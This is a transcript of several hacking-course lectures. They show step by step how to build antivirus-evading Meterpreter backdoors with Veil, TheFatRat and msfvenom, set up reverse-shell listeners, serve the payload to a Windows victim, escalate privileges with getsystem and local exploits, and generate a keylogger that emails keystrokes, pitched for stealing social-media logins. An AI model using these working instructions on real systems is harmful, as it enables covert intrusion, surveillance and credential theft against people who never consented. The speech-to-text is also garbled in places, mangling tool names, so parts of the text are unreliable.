Hello everyone. So in this lecture we'll learn how to generate an undetectable backdoor that turns just a file, and when executed on the target computer it will give us the whole access of the computer. So to basically allow us to hack it and do anything that we want to do that on that computer, there is a number of ways to generate a backdoor. And what you are interested is in a generator backdoor that is not detectable by any antivirus program. Now this is very hard to achieve, as you will see, and we'll going to do this using a tool called veil evasion. Now when veil evasion used to be a standalone tool, but recently the creator has combined with other tools and framework, and they release it using the name of veil framework. So you might see other videos around showing you how to use veil evasion. So these videos are quite old, and the newest version of this tool is literally just called veil. Now I'm going to talk about how we can go and download this veil. So let's just go to your Firefox, search for veil evasion, and go to this first web page from GitHub. So you will see that they are telling you that the veil evasion is no longer supported. As you can see, use veil 3.0. So if you click to the link in here, so this is the link for veil 3, and it will show you the repository for veil 3. Now if you are not familiar with this, with like GitHub is just a version control system. So this allow you to, so this website like GitHub allows you to programmer to post, share and update their source code. So we are going to be using this a lot when downloading programs, and it's very easy to download. Now if you want to download this, all you have to do is just click this in here, copy this git repository. As you can see at the end is git. So just copy this and go to your terminal. I already typed couple of steps. So now go to this opt directory. So just type cd opt. So as you can see, my opt directory is simply empty, which just one file is there, which is Microsoft. opt directory means optional directory where your optional tools and software you can install. So that's why this folder name called opt. So this is where you should be storing your optional program as the name opt. So if I just list only one, so as you can see I am now on opt directory. So just simply type git clone and paste the repository git that you copied in here. So just copy and paste, it will automatically clone. So I cloned and download this framework into this opt directory. Then I just do list, as you can see. So there are two folders now, which is Microsoft and veil. So veil is now cloned. So go to this veil directory by typing veil cd veil. Then as you can see, then list all of those files into this veil directory. So there are lots of files. So we'll go to this config folder. So just go to this folder typing cd config. So there are two folders, which is setup sh and update config.py. So as you can see, I list the directory and there is a setup script. So basically if I run the script, it will install the evasion for me and run an executable in Linux. So all you have to do is just put dot / setup.sh and it will ask you to install. So as you can see, this will continue with the install. Press Y. So just press Y and it will take some time. It will ask you to install a lot of program and install a lot of libraries and program to build to work. So be patient. Now as you can see, there are a large number of libraries and this will going to take some time. So let it go and let it install and in everything. So every time it show you to set up a wizard or install something, just simply install everything, clicking next and until the whole process is finished, and then you will be able to use OL, and we'll see how to do that in next. Now they will ask me to now they are initializing the package installation. After that they will ask me to install all of those. Just simply install all of those and as I said, it will take some time. So let's just wait. So it took around 30 to 40 minutes to install all of the necessary dependencies and files like Python, Wine and etc. So after that, what you have to do now is just open a terminal or go to the directory where you clone the bell. So I cloned it in here, bell. So what you have to do now is you have to just run this file now. And what is just simple, open terminal here or just terminal and go to this directory which is mine. Then just simply, as you can see, I already go to this directory. I had some problem. So if you face problem something like this while running well.py, so just simply install this pip install this, and after that it will simply run. As you can see that we have the welcome screen in here, and now we can start using this well, and we'll cover these tools in the next lecture. So now that we have well loaded, as you can see, it is the main command that you can use it with well. So the first command you can do is to exit. So you can do get info list and all of those available tools. You also need to do the update, because this is very important, because you always want to be up to date when it comes to bypassing the antivirus program, and you can use this as a tool. Okay, let's now start using our validation, and as you can do it is going to become very easy and you will be able to understand it. So there are main two tools, which is these two. So we have the first one, which is evasion, and second one, which is ordnance. So this tool generates a payload that used by evasion. So you can look at this as a helper for secondary tool. Now what I mean by payload is that payload is the part of a code that a backdoor that does the stuff that what you want. So that does the evil stuff, if you want to say. So is the part of the code that gives us a reverse connection. So it's the part of the code that download and execute something on that target computer, and is the part of the code that allow us to achieve what we want to execute that file. And this is going to be become more clear when we start to using this veil. Now for now we are interested in evasion, so we are going to just type use one because one is evasion. So the first thing what we need to do is we need to list all of those payloads, available payloads, into this evasion menu. So just type list, simple, and you can see there's 41 payloads, different payloads in here, and all of those payloads follow a certain naming program pattern. So as you can see, for example, let's use this one. So because that's the payload that I'm going to be using, and you can see that the payload is divided in three parts: first part, second part, and third part. So the first part right here is this. So this refers to the program and the language. So that's the payload is going to be wrapped in. So we have the EBIL code, and EBIL code is going to be wrapped into a certain programming language that the target computer understands. And right here, as you can see, this payload uses the Go program. So we can see many of these payload using different programs like C, CS, Go, PowerShell, Python, and Ruby. So now let's talk about the second part, which is Metapreter. This is really important because this is the type of the payload and the type of the code that's going to be executed on the target computer. In example, which is a payload. So this payload is designed by Metasploit, because this is a huge framework for hacking and it allows you to do a lot of things. But in this lecture we're going to be focusing on creating a payload. And what's really cool about this interpreter is that it runs on the memory and it allows us to migrate between the system process. So we can have like payload or the backdoor running from a normal process like Explorer, for example, and this payload will allow us to gain full control over our target computer. So we'll be able to navigate through the file system, download and upload files, turn on the microphone, turn on the webcam, even use the computer to hack other computer itself, and install a keylogger, and you can literally do anything you can think of. And all of those will be running from a memory from a normal process on the system. So it's very hard to detect and it doesn't leave a lot of footprint because it's really cool, and that's why we'll be using it a lot. And the third part of the name is the method that's going to be used to establish a connection. So in here you can see that is called rev https.py. So the rev stands for reverse and https is the protocol and is going to be used to establish a connection. So we can see that this payload will create a reverse https connection. So you can see this one right here, for example this one. So it creates a various http connection, and we have this one that creates a reverse TCP connection. Now what I mean by reverse is that the connection is going to be come from the target computer to my own computer. So I want to be connected to the computer that I want to hack, and what's going to happen is that once the person double click the backdoor will connect back to me and from the target computer, and that's cool. because then I will be able to bypass antivirus program, because the connection is not going to be detect computer that's coming back to my computer. So it's literally as if the target person is connected to a normal website, and I'm going to use a port of that website that uses like 80 or 8080. So again, if the person analyze the connection, it will look as if they are literally just connecting to a normal website. Also, if the target is computer is hidden behind a router or behind a network, again this is going to work because the connection is coming from the target computer to me instead of me connected to the target computer. So using a reverse connection is really handy, and I think this is really the only practical way of getting access to a computer, because there is a lot of things that you can stop you from connecting a certain computer. Now this is the general naming pattern. You will see some payload like this, like in here, like this one. So what is going to do is going to payload that inject to your other payload, and is going to click and create a normal payload, and the normal payload inject a detector payload. So for example, now it does this to try to bypass more security, and usually they want to bypass more things than the normal payload would bypass. So that's why I usually use one of the names for normal payload in here. And so this is it, that's all about the payloads. So I literally just wanted you to understand what those payload is, what the difference between these reverse and bind and TCP payload is. This way you can just understand and it will be more clear to you, and I can just use the payload that I want without explaining in our next lecture. So we are going to be generating a payload and we will be testing it against antivirus program. So now we are going to be using Veil to create a factor. So the first thing I'm going to do is I'm going to do the list of all the available tools. So we have two tools, which is as usual evasion and ordnance. So we will be using evasion, use one to use this, and then we're going to list all of those payloads. So just type list and it will list all of those payloads. So we will be using number 15. So I'm gonna just type use 15, then we will be using this reverse HTTPS, and it will now first, if you after typing use 15, it will first show me all of those information in here. So as I said, I want to use the interpreter reverse HTTPS, so that's we will be using in here. So as you can see, it gives me lots of information about this particular payload. Then it will show me the option that I can set for this payload in here. So the main option that you want to set, and the most important one, is the IP. So this one, lhost. So this is the IP address which you will be going to be receiving the connection, and as we said, we will be going to have a reverse connection, and we need to set the IP address which the payload or the payload will try to connect back, and in our case we want to receive the connection back to our this machine, Kali machine. So we are going to set the lhost to our IP address of our this machine, which is our Kali machine. Now to give this IP of this Kali machine, you have to know your IP, what is your IP in your Kali machine. So this is my IP, so I will be setting this IP in here, or you can just type ifconfig to check your IP address. Now what we have to do now is we will going to be set our lhost. So we will be setting our lhost as our IP address as our machine. So just type set lhost. This is our lhost, so its IP address will be set in here in this blank space. Then once the backdoor is executed, and I'm going to set, after setting this lhost, so what you have to do now is you have to set your L port. So in default the L port is set a 280, which is really good because that's the port that's used by the web server. So as I said, the connection will look as if the target person is connected to a website, and it's not going to be suspicious. But we don't want to use this port because I'll have a website running on this port. So instead of port 80, we will be using port 8080. This is another port that used by web server, so it's still not suspicious, and it should bypass the firewalls. So I'm just going to just type set L port to 8080, so it will set L port 8080 in here. So what you have to do now is, so you have to just type option to show the updated values. So just type options and press enter, and as you can see, it will show you the updated values in here. As you can see, we set our L host as our Kali machine, and we set L port as our, has changed our L port 80 to 8080. Now if you generate the vector like this, you will need to bypass all the antivirus program except the AVG. So I want to try this, and that's how we know this. So that's not good enough because we want to bypass everything. Now the way antivirus program work is, they have a large database of signatures, and these signatures corresponded to files that contains the harmful code. So what they do is they compare the signature of your file of your this payload to all the files and into this huge database. So if your file matches to their any files, then they will flag it as a virus or as a malware. So if it doesn't, then they will think that this is a normal file and it's not malware. So the main point is in here is that we are going to try and modify the file as our vector as much as possible to make it more unique, so that we bypass the signature of the database, and we will be able to bypass any antivirus program, or we will try to bypass any antivirus program. Now as I said, builders do with that it's an encryption detector, and is infected with the memory so that it doesn't get detected, and is already doing a good job at it. So it's doing pretty much everything except for a couple of antivirus programs. So just to bypass the antivirus programs, we need to set some optional options, and that really won't do such difference. They will just make the backdoor look a bit different. So the first example I'm going to modify is a processor. So as you can see, your processor set as X. So I'm going to modify this processor because we will be using the minimum number of processor to use by this vector. So I'm not going to set a huge number of processor because that will just make my backdoor won't work. So I'm just going to set it as 1. So what you have to do now is simply just set processor as 1, and it will set processor as 1 in here, which is pretty much nothing. So I'm going to set another option, which is sleep. So because that's basically lets the backdoor sleep for a number of seconds that you set before it executed the evil code, and that habit before it executed the payload. So I'm going to set this sleep as 6. Simply just type set space sleep as 6. So it's going to set sleep to the 6. Now let's again check our updated value. So just type option and it will show you all those updated value. As you can see, we set our processor as 1 and also set our sleep value as 6. So now I have my IP address properly, I have my L host, L port, I have my processor, I have my sleep, all of those updated. So I'm going to generate the backdoor now and just simply type generate, because as you can see generate will generate the payload. So this is the command. So simply just type generate and it will ask you to name your file. As you can see, it will ask you to name your output file. So I just set this name as rev http 8080 so that we can remember which payload and which port to use the factor in our feature. Now the payload is generated. As you can see, the payload is generated. It is this using this payload module, which is reverse HTTPS, and it's the executable file is located in this directory, and the name of this payload is reverse HTTPS 8080.exe. as you can see, this is the executable file, and the source code that uses the Go programming, and the Meta Explorer resources, that file uses this one. So as you can see, it's completed and it's give you all the information in here. So just copy this path or go to this directory. Now let's go and check to see if backdoor is detected to how many antivirus program. So we can use a built-in program to using a check BT command, but this feature only uses the signature of the file and it's not 100% accurate. Sometimes it tell you that the file will bypass all antivirus, but it will actually be detected. So you can also use various tools, so I don't recommend that, but please don't do that, because if you do that, you will backdoor will become less effective, because various total shares result of this scans with antivirus program. What we're going to do is we're going to website to check this file if it's detect or not detect to this antivirus. So just go to Google, and I already selected, and go to this antiscan.k, select your file and scan your file. So as you can see, it already detected because I previously scanned on my computer with this file. That's why it already detected with lot of antivirus. Also, as you can see, it detected clean on many antiviruses. Even on Commodore is popular antivirus, as you can see. So as you can see, this file is bypassing lots of program, also not bypassing lots of antivirus program. So we can use this backdoor against any device, and we will be sure that the device or computer will not be able to detect this file as a virus, because most of this computer do not run this antivirus, and most of this computer always runs like Malwarebytes, Panda antivirus, this of it. So it will show you clean, but it might get detected. Also, it might not get detected in those antivirus, because depending on the way the backdoor is getting encrypted and is getting generated. I have actually generated this backdoor while using this, so it did not detect it with Avast. Previously I used this file to check on my Windows machine, but did not detect in here. But as you can see, it was showing you that it will detect. But as I said, it may detect or may not detect. In those antivirus, those are shown in red. I generated, it will generate with 10 seconds and it will still get detected. Then if you just try to modify those values to try and check whether it will detect or not. So as you can see this value, so change this value to 6 to 10, you may not able to bypass other antivirus. So what you want to do is you want to keep playing around with these options. You want to keep playing around with this payload until you manage to achieve the best result, so that you can bypass as much as antivirus as much as possible using this method. That we created uses a reverse payload. So like I said before, it does not open a port in the target computer. It actually connects from the target computer to our computer, and by doing that it will bypass firewall and it will look less suspicious. So for this to work, we need to open a port on our computer. So what you need to do is you need to open our Metapredator, which is Metasploit. So just type msf console, then it will open our Metasploit. So now so I'm going to use a Metapredator framework. Now to use or run a Metapredator deploy, all you have to do is just msf console. So the method or the interpreter operator that will create it for us is actually programmed by the people who makes this exploit. So that's why we are using Metasploit to listen for our incoming connections. So validation actually uses Metasploit to generate the backdoor that we created in our previous lecture. So to listen for incoming connection, we are getting used to this module limiter. So what I said, what you have to do now is you have to use our this handler. So just type use exploit multi / handler, then it will load this handler, which is in default is reverse TCP. So don't worry, we will use our reverse HTTPS. So just type option. As you can see, it uses generic reverse TCP. So what you have to do now is we have to change this to our previous reverse HTTPS that we created the payload, the same payload method. So simply what you have to do is change this module. Change. So what you need to do is change this payload to this one. So just type set payload and it will change this payload to this one. So simple, just type payload and then again show options to check if this payload is changed or not. As you can see, it already changed to our reverse HTTPS payload. Then what you need to do is we need to, as usual as previously what we did, change our lhost and lport. So simple, set lhost to the IP address of our Kali machine or use this machine that you will be using, and as same set payload to 8080 that we previously set. As you can see, after that show option gives you all the updated results in here, and after that simply type exploit, and as you can see it is generated and start to exploit in this machine and in this port. So what you have to do now is the file or the backdoor that we created previously, we need to send it to our Windows machine. So we have to go to this directory where your backdoor was created. So var, you have to go var lib val output compile. As you can see, this is our backdoor that we created last time. So just copy this paste it to the Apache web server that was built in Kali machine, so which is in this directory www.html. So I created a folder, so I paste it in here. As you can see, this is our payload. So what you have to do now is you have to run our Apache server. Simple, just go to the directory. As you can see, this is our IP of our Kali machine and this is the directory of this folder. Just download it, and as you can see, my antivirus didn't even detect it and it was saved. So what you have to do now is you have to just open this file. So just press open, more info, run anyway. So let's try to download again. I changed the sleep time so that, so as you can see, it already run, and as you can see, it didn't even recognize and it run. So you see the target machine is connected and it is working. So now we have a basic full control over that computer, this computer right here, and we have a like material session, and then the interpreter will allow us to do anything and literally anything that the user have, and you can do on this computer, which is the Windows 10 in our virtual machine. So that's how this payload works using this reverse HTTP payload. So now in this lecture, I would like to show you another tool that allows us to generate undetectable payload. So this tool is called FATRET, and as you can have a question like it does, so okay, you have a question like previously you also use this another tool to use the same payload, why we need another one? Well, the reason is, as I said before, when it comes to antivirus validation, we're going in a loop. So antivirus program release an update that render the other veil than another program that may be detectable. So you might have to modify the options of the payload like I said before, or you could try to use different tools. So I'm showing you a different tool just in case you're trying to generate a payload using veil and is getting detected, then you can just come in and try different tool. Now in this example we are going to be using and trying the FATRET, and we will see how to generate on undetectable backdoor as well. So the FATRET could be the opposite, so you might be generating something using FATRET, and in this case the detective, and you can go and try to veil evasion. So always you need to keep in mind that you want to make sure that these tools are always updated. So you are going to make sure that you have the latest, and you should be able to bypass the most if you have the latest update version. So if not all antivirus program, the third time also has some option to generate the backdoors for other operating system, this FATRET. So this FATRET has can detect outdoors from like Mac OS, Linux, and even from Android. So and also we'll be talk about that later. So for now we're going to be talk about how to installing this FATRET, because it doesn't come pre-installed with Kali Linux. So first thing you want to do is go to their website, which is the GitHub, and just go Google search about FATRET and it will come to this website. As you can see, just visit this website. And I'm going to put and copy as usual as previously, just copy this git clone. Then after that what you have to do is just go to this OPT directory where I will be installing this option tools. So as you can see, previously installed well. So now we'll be install this factored. So just simply type git clone and then type and then just paste this factored.git. As you can see, it will clone all of those factored file into your machine. So it will take some time. As you see, I already took like 10 minutes because my machine Kali machine cannot really take my full bandwidth, so it's taking nearly 1/3 of my bandwidth. So that's why it's taking somewhat long. So let's just pause and we'll come back when it's done. Okay, it's already 99%, so let's just wait a bit. The installation process is pretty much the same as well that we previously did. So if you previously installed well following the same procedure that I showed, then you will have no problem installing this factored because it's pretty much the same process. So we are done with cloning. So let's go to this factored folder. So just type cd the factored, then list all those files that are in here. So what you have to do now is you have to use this setup.sh. So we need to use this file and we have to run this set of scripts to do that. So first, as you can see, it is not in green, so that's why you cannot execute this file in default. So you have to make sure to use some command to execute first. So what you have to do now is you have to set a permission to this file so that we can execute. So we can using this by a command which is chmod plus x, then just type the file name setup.sh. So let's again list all of those files to see if we can. As you can see, it's now in green, so we can literally execute now. So let's just type /, then setup.sh. So just press enter. So it will take some time, but it's installing. As you can see, it's now executable as it's green. So they will be checking to see if anything missing. As you can see, so far everything is, I think, installed in my machine. Because if there was anything missing, then it will tell us that this thing is missing and it will install these things for you. As you can see, it's checking and it's checking the libraries and packages. So if address detected an incorrect correction of install, do you want to remove it and install the appropriate? Yes. So this is gonna generate and automatically install all of the things. You don't need to do anything, and it will generate all of those and it will install all of those. So it's installing Java right now. So if any of these conditions do not met, and if any of those software or tools isn't in your Kali Linux machine, then it will automatically download and install in here so that it can run properly. So let's just wait, and I will get back to you once all of this is done, because this will take some time. It will take about 10 to 15 minutes to install all of those. So let's just wait. So finally the installation process is done, and it will after completion of the installation process, it will go to this page, and as you can see, it will ask you to write the directory where this file will be saved. So I have selected this directory, so just press enter. So as you can see, all fat rate generated file will be stored on this directory, so press enter. So do you want to create a shortcut for fat rate? So press Y to create a shortcut, so that you can simply just type fat rate to open this tool. So press Y. So as you can see, installation is complete. So we will be able to run this from anywhere. So I'm just gonna say that fat rate, as you can see. So if we just run this, you will see that the program is starting up, and it will give us a note. So as you can see, it will checking all of this is found or not. As you can see, all of this is okay. As you can see, it is asking us not to, as you can see, don't upload backdoor to this website. So don't upload to this website. So you can upload backdoor file to this nodistribute.com website. So let's just press enter. So it's up and running, as you can see. So this is the main page. So the tool is ready to be used, and we're going to be talk more about this in future lectures. So this is just for how to install this, and we did that. So actually learned a few Linux command that is gonna come handy in your long run in futures. Hello everyone. So in this lecture we will be talking about privilege escalation. So one of the most important phase during penetration testing or vulnerability assessment is privilege escalation. During that step, hacker and security researchers attempt to find out a way, like as an example, like exploits or bugs or misconfiguration, etc., which will the researcher likes find these types of way to escalate between the system account, and of course vertical privilege escalation is the ultimate goal. So for many security researchers, this is like a fascinating phase. So frequently, especially with client-side exploits, you will find that your session only has limited users, and those limited users have like limited user rights. So this can severely limit actions that you can perform on the remote system, such as dumping passwords, manipulating the registry, installing backdoors, or similar like things, etc. Fortunately, Metasploit has a Metapredator script which is get system, and this script that will use a number of different techniques to attempt to gain a system level privilege on the remote system. And there are also other local exploits that can be also used to escalate the privileges. So using the infamous Aurora exploit, which will be this one, as you can see, we'll see that our Metapredator session is only running as a user account. So as you can see, just simply run the Aurora Metaexploiter exploit, and after that it will automatically run onto this IP address. As you can see, Metapredator session open onto this IP address from this to this, and it is started from session 3, from these 3 sessions. And after that, how we're going to get our UID, so user ID. So this is our user ID and this is the victim, as you can see. So to make use of the get system command, if it's not already loaded, we will need to load our prev extension first. So after get UID, we will need to get our previous prev extension. So simply just type use space prev and it will automatically load the extension prev. As you can see, it is a success. And running the get system with -h, so it will display those options. As you can see, this option will attempt to elevate your privilege to the local system, like -h will give you help banner, -t will give you the technique to use this, like 0 to all available, 1 is to for pipe impersonation, 2 is to use for name pipe impersonation for dropper or admin, and previous was for memory, and in 3 is for token duplication. So we'll let Metapredator try to do the heavy lifting for us by running the get system without any options. So the script will attempt every method that is available to it, and then it will stop when it succeeds. So within a blink of eye, our session will be running with system privilege, like just this. So as you can see, just simply type get system, got us the get system via the technique 1, which is this technique. So yeah, which is the in-memory admin, and as you can see, after typing the get UID, it give you the authority or system administration with just a simple one command. Then now we'll use our local exploits. So there are situations, like in a couple of situations where get system will fail, for example like this. So as you can see, by just typing get system, operation fail because access is denied. So when you see, or somehow if you see this error, then we are able to break down the session, and then we will manually try some additional exploits that Metaexploit has to offer, and make sure that there are available exploit, because this will change over the time. So after that, we will just now try to use the famous Kitrepody exploit on our target, which is this one. As you can see, we will be using this Kitrepody. We have to exploit on our on our target. So our example box is like 32-bit machine, which is listed as one of the vulnerable targets. As you can see, this is our system. Session 1 is running, and this is selected as a target for vulnerability. So after that, what you need to do is you just simply need to use that Kitrepody vulnerability, or use this exploit. So simply just type this one. As you can see, just type this one as vulnerable to exploit. After this, you need to select session 1 that we previously saw, this session 1, and after that we need to set our payload as reverse Metapredator reverse TCP, which we previously we saw a lot of work onto this reverse TCP. And then we need to set our L host as our machine IP address, which is this one. and also we need to manually set our L port, which is 4443, and after that simply just typing option will give you updated value onto this Metapreter payload and onto this exploit. As you can see, it is running on session 1. As you can see, session 1 is running on module, and payload using this payload, as you can see, and it is using this exploit, and it shows you all of those updated values that you set. As you can see, this is the IP that we set, this is the L port that we set, and all of those options. So after just exploiting the target, as you can see, Windows 7 is right now on exploit mode, and just simply typing exploit will start the reverse handler onto this IP that we selected, and it is processed. As you can see that it is rejecting the exploit into this port, and after that, after exploiting finish, as you can see, the payload execution is complete, and into this sending to this IP address, and Metapreter session 2 is open, and as you can see from this one as this one, and as you can see we have now authority server administration or privileges using this under this machine. So that's all about the privilege escalation. So in this lecture we are going to be talking about keyloggers. A keylogger is a program that runs in the background of the target computer and basically records all key strikes that the target person enters on their computer. So it doesn't matter where they use the keyboard, whether they use it to log into a website, whether they use it in a chart, whether they use it to write stuff and ever document and the program, because this program will usually just record every key strike. The person that type on the keyboard and then send it to you to your email to analyze. Now you might think, why would I want to do that? You already know how to create a backdoor, and the backdoor that allow you to gain full control over your target computer. So you will be able to record all the key strikes, and you will also be able to do much more, because the backdoor basically allows you to do whatever the target person can do. Well, the reason why you might need a keylogger is that, first of all, the keylogger that comes with Ampere and with the Metapreter store. So the data on the file, they started with the data on the computer also. For you to able to read the data, you will need to come back after a while and connect to this computer through your backdoor, and then you will be able to read the data with this keylogger that you have gathered. Whereas when it comes to the keylogger that we are going to have a look at now, it will actually run on the background and send the data to you through your email. So it's always going to be working there, as also always going to be sending the data to you. So you want to have a connect back to the target computer. So there won't be any connection between you and the target computer, so it's less likely to be detected. And another reason why you might use a keylogger is you might not be interested into hacking the target computer like previously what you did with Whale and the Fathread. So you don't target could be a website that the target person uses a Facebook account or Twitter account, so the target computer is really not useful for you. So there is no point of them sending them a backdoor and then have a connection coming back from that computer to your computer and have all the data getting transferred between you and the target computer, and you really, so there is nothing really useful on that computer. So it's modular thing to do that, because send them to a backdoor, and the backdoor is getting or going to run in the background and then send you to the data and the stuff that the person types to your email, and then you can analyze them and log in as an account owner, whether it's a server or whether it's a Facebook or any other types of account. It's literally records everything. So the target person types on the keyboard, and so to do this we are going to use a keylogger program called blogger. So literally just search blogger and the first page it will access all of those. So as previously we are going to download the same way that we are download the veil and fat rate, and we are going to download it from here. Just copy this and get the repo the same way that we previously downloaded. So as usual I already downloaded it, so again let's show you the process again. So this process is also the similar way that you do. So as you can see I already installed the blogger, so for testing purpose. So let's show you the process again. So what you have to do, go to the opt directory, cd space opt. Okay, I did wrong. So cd opt, then list all the directory, then we'll type git clone, then this blogger, and just press enter, then it will clone all of those files in here. So now we'll go to this blogger directory. So just type blogger, list all of those, and previously what you need to do now is install this file. So as previously the same process it will install like for veil and fat rate the way that we install. So simply just install this, and after that when the install process is done it will ask you to install some application. It will automatically install everything. What you have to do now is just as previously next, and you're done. After that what you have to do now is you have to run this b.py program. So just simply type this, as you can see it's working. So just press enter, and then you can generate keylogger, update, and any of these tools using this, and make sure it is for educational purpose. So they are not responsible for any illegal use of it, and that's it. As you can see the tool you can use it now and it is ready to use. So we're gonna have a look on it and how to use it, and we'll test it for this to generate in our next lecture. So okay, now that we have the tool is loaded, let's see how we can use this tool to generate a keylogger. Now you can see that it is given us the command that you can generate, like you can see it's given us the command like kuq. So you can use this tool and it's very simple. You can use k to generate keyloggers, you can use u to update, and q to quit. Now if you do type u, as you can see I am already in updated version. So the next thing I'm going to do is I'm going to put k to use this keylogger and to generate it. So this looks like the Word document. You can generate a Adobe Flash update, fake Word document, Excel document, PowerPoint, Acrobat PDF, and also you can use and generate a blank executable. But these files are not very appropriatable, because this or document, Excel or PowerPoint, they just put an icon of this document and then they make it executable, and they will rename it to the executable to like test.exe, and instead of test.exe, it's not very convincing. That we're going to be look at a better way that we can do in our future lectures. So for now I'm just going to create a blank executable which is number 6. So just type 6, then just they will ask you to test your type your email that will receive all those logs that will generate using this executable. So make sure you don't use your main Gmail, and make sure you create a testing purpose and Gmail, and then make sure you use that Gmail and not the main Gmail. So I'm just gonna use this for a test purpose like any Gmail for testing purpose, and type gmail.com. Then we'll type password as abc123 abc123. So just press enter. As you can see, my test Gmail and password is this one. So and now this tool is showing the information that you enter to make sure that everything is correct. So if you put the wrong information in here, the keylogger will not work, and you won't be able to receive those report. Now everything is in this correct. So if you just press Y, and it will create a payloader into a dist folder. So I already created one. So using my test Gmail, so not this Gmail, I already created one, and it will be saved in your blogger folder, in your dist folder, not this. Okay, in here. So let's visit opt blogger. So as you can see, it will create a b dot. So it will create a generator. Then what you have to do now is, then it will create a generator which I already created. So simply what is just type W and Y, because this information correct, and it will generate. And the main thing is, make sure you go to this page, because otherwise you won't receive the less secure apps. Make sure your less secure apps is turned off. I cannot really turn off because this is my main account. So this is turned on, because when you use your test Gmail, so make sure you visit this web page, and make sure you turn this off, so that you can receive the less secure emails. Then after that, we're going to test. So I already test my b.exe. As you can see, the file I generated is almost secure from all antivirus. So as you can see, none of them antivirus is generate or make this as a fault. So 26 antivirus make it as clean. So it bypassed nearly all famous antivirus program, and everything else will be able to bypass it, and they won't be able to make it as a harm file. So that's why you use blogger to generate a keylogger using this simple method. Hello everyone. So in this lecture we're going to be talking about payload backdoor. So The Metaxploit framework is the most commonly used framework for hackers worldwide. It allows hackers to set up listeners that create a conducive environment, which is as interpreter, to manipulate the compromised machine. So now we'll look at the framework within Kali Linux that can be used to attack a Windows machine, and we'll do this through a malicious executable file using MSF Venom or Metapletter. So now I will discuss how to create a backdoor. Then we will use command or terminal to create a backdoor. Then we can actually use this executable backdoor on the Windows machine, and we will send this to our target machine, and we will execute this, and then we will attack that machine using a communication channel that can operate the victim. So we'll create a backdoor using Metaxploit. So first of all, you need to turn on your Kali Linux machine, open terminal in here, and then just type msf venom. After that, we are going to select our use -p to select our payload, which will be our reverse TCP. So just type Windows / Metapletter / reverse _TCP. Then so what we did, we use our MSF Venom, we select our payload, which is Windows Metapletter reverse TCP. Then we need to define an IP address of our Kali Linux machine. So we need to select our L host, which is the Kali Linux machine IP address. L host is equal to, so let's check our Kali Linux machine. So let's create another terminal, type ifconfig. So let's see, so this is our L host. So just type 192.168.1.102. Then we're going to select our L port. You can select any port you want, but I'm going to select port as 12345, a random port. You can choose any port you want. Then we need to select our executable or extension format. So what you need to do is you need to type -f, which is our extension format, and our extension will be executable file, which is exe. So exe is our executable file. Then after that, we are going to have to select our name our executable file. Just then type -o, then name as Windows backdoor. So let's type backdoor.exe. So then press enter. It will take some time, like 10 to 15 seconds. Then it will initialize this payload, under this L host and under this L port, using this name and using this executable file. So as you can see, Windows backdoor is created. and it created where? It created in root. So let's just show if this is created or not. Go to root. So we need a root access to go in here. So just type root. So give root access. As you can see, it has, so as you can see, it created a Windows backdoor payload, which is our exe or executable file. So this is going to be our executable file to perform our security breach. So we need to use, so what you need to do is now, so let's you need to move this file into your service folder or your Apache server, which is located in here. So I already pasted this file here, as you can see, Windows backdoor. So we need to do is, you need to copy this file in here or make a folder and paste this in here like I did, because Kali Linux has a built-in web server, so that you can transfer this executable payload into your attacker machine, which is our Windows machine. Then what you need to do is, we need to give our permission. So just type ls to list all of those files in here, and then type chmod plus x, then the name of the file, which is Windows. Just type place tab and it will automatically rename all of those. So just type this and list again. As you can see, it is now executable because it's showing in green. So let's just copy this and send it to in here, because it is on previous file. So let's just delete this and send it our this file. So copy var to our Apache server and into this folder. So let's just copy this. Then what you need to do now is, you need to open your restart your Apache server, because you cannot visit your server unless you restart it. Okay, let's show you this, because 192.168, as you can see, I cannot visit in here because my Apache server is not open. So let's just open service apache.start. So as you can see, just reload this page, 192.168, 192. As you can see, it loaded and it has a Windows backdoor that we created right now. So right after that, after our web server is open, we need to open our MSF console. So let's just open MSF console in a new tab. So just type MSF console and it will load your Metapredator framework. As you can see, Metaexploit framework, it load up. So next I will show you how we can use this to gain access or send this file to your Windows machine and get your payload and receive and privileges and all of those using this Metaexploit. So as you can see, we opened our Metaxploit framework to handle the request. So I will start now Metaxploit framework to start our process, and this is going to use it to perform our security breach. So to handle the request that we exploit, then you can exploit in like Windows, Linux or Android if you want, but we are going to exploit on our Windows. So let's now use our exploit handler. So what you have to do now is, let's minimize this. So just type type use exploit, exploit multi handler. So we're going to use this. Okay, we type multi and here. So as you can see, we are into this exploit mode now. So what you need to do now is we need to specify our payload. So we are going to set our payload because we are using a generic payload, but we don't want that. We want a Windows payload. So we are going to set our payload by just typing set payload, and the payload will be the Windows reverse TCP, Windows meta, many typing mistake, metapreter / reverse underscore TCP. Very simple. Just type this. As you can see, we are now into this reverse TCP mode. So let's just show option to clear our show options to see. As you can see, we are now in Windows Metapreter reverse TCP. So what you need to do now is we need to set our L host. So we need to set our L port because in default it is not set. So we need to set both of those. It is very easy, like we previously did. So simply just type set L host, and you will set L host to your Windows Kali machine, which is 192.168.1.102. You can check your IP by simply typing ifconfig or just right clicking in here configuration. As you can see, this is our IP address. Then we set our, okay, not this one, not this, okay, we set 192.168.1.102. So we set our L host, we set L port as 12345, and simply we then exploit exploit. So as you can see, it started our reverse TCP connection handler onto this request, onto this IP address. So what we need to do now is we need to send our executable payload that we created using this to our Windows machine. So I cannot really show you on my main machine. So let's open a virtual machine, which is this one. So let's open one Windows 10 in our virtual machine. And we will be testing those file in here. So Windows 10 is very heavy on using the virtual machine. So let's type our password. Reset. Okay, we are in. So let's just download our file. So Windows 10 on virtual machine is a power hungry. So even on my 16 GB RAM, it's taking so long to even get into this machine. Come on. This never happened before. What is happening? This seems like the Windows is open, but the display is nowhere to be seen. So, okay, let's pause to solve this. So it finally opened. So what you have to do now is you have to just download and go to your server, your Linux server. As you can see, this is my directory of my files that we created for payload, and now we will just execute this file. Simple. So just download to your Windows machine, just double click it, as I already double clicked. So right, as you can see, my Metapredator session is already in live. See, as you can see, session was open, so it died because maybe file was deleted. So let's open, save again, run. So as you can see, the session is open. The session was open. So what? Error command sysinfo. So we can run any command in here, like let's try Control X. So let's try again, show options. So let's exploit exploit. So as you can see, let's try to antivirus. Windows 10 is, as you can see, the Metapredator session has opened. Previously it shows some problem, so let's type sysinfo. As you can see, all the information you can have right now from your Windows, like my Windows is Windows 10 x64-bit. You can have anything, and you can do anything right now in here because you have now accepted your payload. So let's try a screenshot. So it's saved to our root folder, as you can see. So it created our screenshot in Windows. So you have full access right now into this Windows machine. And you can do anything you want in here because you have now full access of this Windows machine in your Kali Linux Metapredator terminal. So you can do like you can to play command, you will play from, you can record mic, webcam chat, you can do anything, get desktop, 